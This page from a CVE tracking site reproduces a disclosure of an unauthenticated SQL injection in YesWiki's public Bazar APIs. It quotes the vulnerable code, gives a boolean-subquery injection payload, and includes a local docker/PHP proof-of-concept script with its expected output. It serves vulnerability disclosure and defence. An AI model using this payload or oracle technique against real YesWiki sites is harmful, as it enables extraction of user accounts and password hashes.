CVE-2026-52770

HIGHPre-NVD 7.57.5
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.5 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
7.5
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 7.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

YesWiki: SQL Injection possible through public Bazar entry-listing APIs via numeric query/queries filters

Summary

YesWiki’s public Bazar entry-listing APIs are vulnerable to unauthenticated SQL injection in numeric query / queries filters.

For Bazar fields whose value structure is numeric, YesWiki escapes the attacker-controlled filter value but inserts it into SQL without quotes or numeric validation. An unauthenticated attacker can inject boolean SQL expressions and infer database contents from whether entries are returned.

Details

The public Bazar API reads attacker-controlled query filters from GET parameters:

// tools/bazar/controllers/ApiController.php
$vQuery = $_GET['query'] ?? $_GET['queries'] ?? null;
$vQuery = $vSearchManager->aggregateQueries(
    !empty($selectedEntries) ? ['queries' => ['id_fiche' => $selectedEntries]] : [],
    isset($vQuery) ? urldecode($vQuery) : ''
);

Relevant public routes include:

@Route("/api/forms/{formId}/entries/{output}/{selectedEntries}", methods={"GET"}, options={"acl":{"public"}})
@Route("/api/entries/{output}/{selectedEntries}", methods={"GET"}, options={"acl":{"public"}})
@Route("/api/entries/bazarlist", methods={"GET"}, options={"acl":{"public"}})

The query is passed into BazarListService::getEntries() and then into SearchManager::search():

// tools/bazar/services/BazarListService.php
$vLocalEntries = $vSearchManager->search(
    array_merge(
        $pOptions,
        [
            'formsIds' => $vLocalIDs,
        ]
    ),
    true,
    true
);

The vulnerable sink is in SearchManager::buildQueriesConditions():

// tools/bazar/services/SearchManager.php
if ($vDescriptor['_type_'] == 'number') {
    if (isset($vValue) && trim($vValue) !== '') {
        $vValueConditions[] = 'CAST(' . mysqli_real_escape_string($this->wiki->dblink, $this->renameJSONPathVariable($vFieldName)) . ' AS DOUBLE) ' . $vComparisonOperator . ' ' . mysqli_real_escape_string($this->wiki->dblink, $vValue);
    }
}

Because numeric values are not quoted, SQL syntax remains active after escaping. For example, the following value is accepted as part of the numeric expression:

100 OR (SELECT COUNT(*) FROM yeswiki_users)>0

This produces a predicate equivalent to:

CAST(bf_age AS DOUBLE) > 100 OR (SELECT COUNT(*) FROM yeswiki_users)>0

Read ACL filtering and Bazar Guard processing do not prevent exploitation because the injected SQL expression is evaluated by the database before returned rows are post-processed.

Numeric Bazar filters are a documented/common feature. The documentation includes examples such as:

query="bf_age>18"
query="bf_age >= 20 | bf_age < 40"

Bazar numeric fields are also common through field types such as number, range, and map latitude/longitude fields.

PoC

The following local-only PoC uses the shipped SearchManager code with a minimal MariaDB fixture. It demonstrates that a true injected boolean subquery changes the returned entries, while a false subquery does not.

Run from the repository root:

set -euo pipefail; name="yeswiki-audit-db-$$"; docker run -d --rm --name "$name" -e MARIADB_ROOT_PASSWORD=auditpass -e MARIADB_ROOT_HOST='%' -e MARIADB_DATABASE=yeswiki mariadb:11.4 >/dev/null; trap 'docker rm -f "$name" >/dev/null 2>&1 || true' EXIT; until docker exec "$name" mariadb-admin ping -h127.0.0.1 -uroot -pauditpass --silent >/dev/null 2>&1; do sleep 1; done; docker run --rm -i --network "container:$name" -v "$PWD:/repo:ro" --entrypoint php phpmyadmin:5.2.1 -d error_reporting=E_ERROR -d display_errors=1 <<'PHP'
<?php
namespace YesWiki\Bazar\Service {
    class EntryManager { public const TRIPLES_ENTRY_ID = 'yeswiki-entry'; }
    class FormManager { public function getMany($ids) { return [1 => ['prepared' => [new \DummyNumberField()]]]; } }
}
namespace {
    class DummyNumberField {
        public function getPropertyName() { return 'bf_age'; }
        public function getValueStructure() { return ['bf_age' => ['_mode_' => 'single', '_type_' => 'number']]; }
    }
    class DummyServices {
        public function get($class) {
            if ($class === 'YesWiki\\Bazar\\Service\\FormManager') { return new \YesWiki\Bazar\Service\FormManager(); }
            if ($class === 'YesWiki\\Bazar\\Service\\EntryManager') { return new \YesWiki\Bazar\Service\EntryManager(); }
            throw new \RuntimeException('Unexpected service: ' . $class);
        }
    }
    class DummyWiki {
        public $dblink;
        public $services;
        public function __construct($dblink) { $this->dblink = $dblink; $this->services = new DummyServices(); }
        public function GetConfigValue($name, $default = null) { return $name === 'min_search_keyword_length' ? 3 : $default; }
        public function UserIsAdmin() { return false; }
        public function getUserName() { return 'Anonymous'; }
    }
    class DummyDbService {
        public function getCollation(): string { return 'utf8mb4_unicode_ci'; }
        public function prefixTable($tableName) { return ' yeswiki_' . $tableName . ' '; }
    }
    class DummyAclService { public function updateRequestWithACL() { return '1=1'; } }

require '/repo/tools/bazar/services/SearchManager.php';

$db = mysqli_connect('127.0.0.1', 'root', 'auditpass', 'yeswiki'); if (!$db) { throw new \RuntimeException(mysqli_connect_error()); } mysqli_set_charset($db, 'utf8mb4');

foreach ([ "CREATE TABLE yeswiki_pages (id INT PRIMARY KEY AUTO_INCREMENT, tag VARCHAR(64), time DATETIME DEFAULT CURRENT_TIMESTAMP, user VARCHAR(64), owner VARCHAR(64), latest CHAR(1), comment_on VARCHAR(64), body JSON)", "CREATE TABLE yeswiki_triples (resource VARCHAR(64), value VARCHAR(64), property VARCHAR(128))", "CREATE TABLE yeswiki_users (name VARCHAR(64), password VARCHAR(256), email VARCHAR(191))", "INSERT INTO yeswiki_users VALUES ('admin', 'dummy_hash_marker', '[email protected]')", "INSERT INTO yeswiki_pages (tag,user,owner,latest,comment_on,body) VALUES ('EntryA','alice','alice','Y','',JSON_OBJECT('id_typeannonce','1','id_fiche','EntryA','bf_age','10')), ('EntryB','bob','bob','Y','',JSON_OBJECT('id_typeannonce','1','id_fiche','EntryB','bf_age','20'))", "INSERT INTO yeswiki_triples VALUES ('EntryA','yeswiki-entry','http://outils-reseaux.org/_vocabulary/type'), ('EntryB','yeswiki-entry','http://outils-reseaux.org/_vocabulary/type')", ] as $sql) { if (!mysqli_query($db, $sql)) { throw new \RuntimeException(mysqli_error($db) . " in " . $sql); } }

$ref = new \ReflectionClass(\YesWiki\Bazar\Service\SearchManager::class); $sm = $ref->newInstanceWithoutConstructor(); foreach (['wiki' => new DummyWiki($db), 'dbService' => new DummyDbService(), 'aclService' => new DummyAclService()] as $prop => $value) { $rp = $ref->getProperty($prop); $rp->setAccessible(true); $rp->setValue($sm, $value); }

$cases = [ 'control_no_match' => 'bf_age>100', 'boolean_true_subquery' => 'bf_age>100 OR (SELECT COUNT(*) FROM yeswiki_users)>0', 'boolean_false_subquery' => 'bf_age>100 OR (SELECT COUNT(*) FROM yeswiki_users WHERE 0)>0', ];

foreach ($cases as $label => $query) { $params = ['queries' => $query, 'formsIds' => [1]]; $sql = $sm->prepareSearchRequest($params, true, false); $result = mysqli_query($db, $sql); if (!$result) { throw new \RuntimeException(mysqli_error($db) . " in " . $sql); } $tags = []; while ($row = mysqli_fetch_assoc($result)) { $tags[] = $row['tag']; } sort($tags); printf("%s: %d rows [%s]\n", $label, count($tags), implode(',', $tags)); if ($label === 'boolean_true_subquery') { echo "where_fragment=" . preg_replace('/^.* WHERE /s', '', $sql) . "\n"; } } } PHP

Expected vulnerable output:

control_no_match: 0 rows []
boolean_true_subquery: 2 rows [EntryA,EntryB]
where_fragment=((CAST(bf_age AS DOUBLE) > 100 OR (SELECT COUNT(*) FROM yeswiki_users)>0)) AND 1=1
boolean_false_subquery: 0 rows []

The no-match control returns no rows. The false injected subquery also returns no rows. The true injected subquery returns rows, proving that attacker-controlled SQL is evaluated inside the numeric filter.

Impact

This is an unauthenticated SQL injection vulnerability.

An attacker can use public Bazar API endpoints as a boolean oracle to infer data accessible to the YesWiki database user. This may include user account data, password hashes, password recovery material, private wiki metadata, or other sensitive database contents.

CVSS v3
7.5
EG Score
7.5(low)
EPSS
KEV
Not listed

Published

July 9, 2026

Last Modified

July 9, 2026

Vendor Advisories for CVE-2026-52770(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 14× in last 7d / 14× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-15 18:58 UTCEG score recompute
  2. 2026-07-15 08:06 UTCEG score recompute
  3. 2026-07-14 21:13 UTCEG score recompute
  4. 2026-07-14 10:21 UTCEG score recompute
  5. 2026-07-13 23:30 UTCEG score recompute
  6. 2026-07-13 12:39 UTCEG score recompute
  7. 2026-07-13 01:48 UTCEG score recompute
  8. 2026-07-12 14:57 UTCEG score recompute
  9. 2026-07-12 04:06 UTCEG score recompute
  10. 2026-07-11 17:12 UTCEG score recompute
  11. 2026-07-11 06:21 UTCEG score recompute
  12. 2026-07-10 19:28 UTCEG score recompute
  13. 2026-07-10 08:37 UTCEG score recompute
  14. 2026-07-09 21:46 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-52770?
CVE-2026-52770 is a high vulnerability published on July 9, 2026. YesWiki: SQL Injection possible through public Bazar entry-listing APIs via numeric query/queries filters Summary YesWiki’s public Bazar entry-listing APIs are vulnerable to unauthenticated SQL injection in numeric query / queries filters. For Bazar fields whose value structure is numeric, YesWiki…
When was CVE-2026-52770 disclosed?
CVE-2026-52770 was first published in the National Vulnerability Database on July 9, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-52770?
CVE-2026-52770 has a CVSS v4.0 base score of 7.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-52770?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-52770, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-52770

Explore →

Is Your Infrastructure Affected by CVE-2026-52770?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.